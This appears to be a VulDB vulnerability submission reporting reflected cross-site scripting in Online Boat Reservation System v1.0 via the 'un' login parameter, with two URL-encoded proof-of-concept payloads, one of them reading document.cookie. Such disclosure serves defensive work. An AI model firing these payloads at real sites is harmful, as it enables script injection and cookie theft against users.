| Field | Value |
|---|---|
| Title | Online Boat Reservation System v1.0 /boat/login.php POST parameter 'un' has XSS vulnerability |
| Description | An issue was discovered in Online Boat Reservation System v1.0. There is an XSS vulnerability that makes it possible to inject arbitrary JavaScript into the application's response via the /boat/login.php POST parameter "un". Payload1: `un=a%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Ea&up=bb&login=` Payload2: `un=a%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ea&up=bbb&login=` |
| Source | https://github.com/jidle123/bug_report/blob/main/vendors/winex01/Online%20Boat%20Reservation%20System/XSS-1.md#online-boat-reservation-system-v10-by-winex01-has-cross-site-scripting-reflected |
| User | jidle (UID 41297) |
| Submission | 24.02.2023 12:34 (3 years ago) |
| Moderation | 24.02.2023 20:36 (8 hours later) |
| Status | Accepted |
| VulDB entry | 221755 [SourceCodester/code-projects Online Boat Reservation System 1.0 POST Parameter /boat/login.php un Cross Site Scripting] |
| Points | 19 |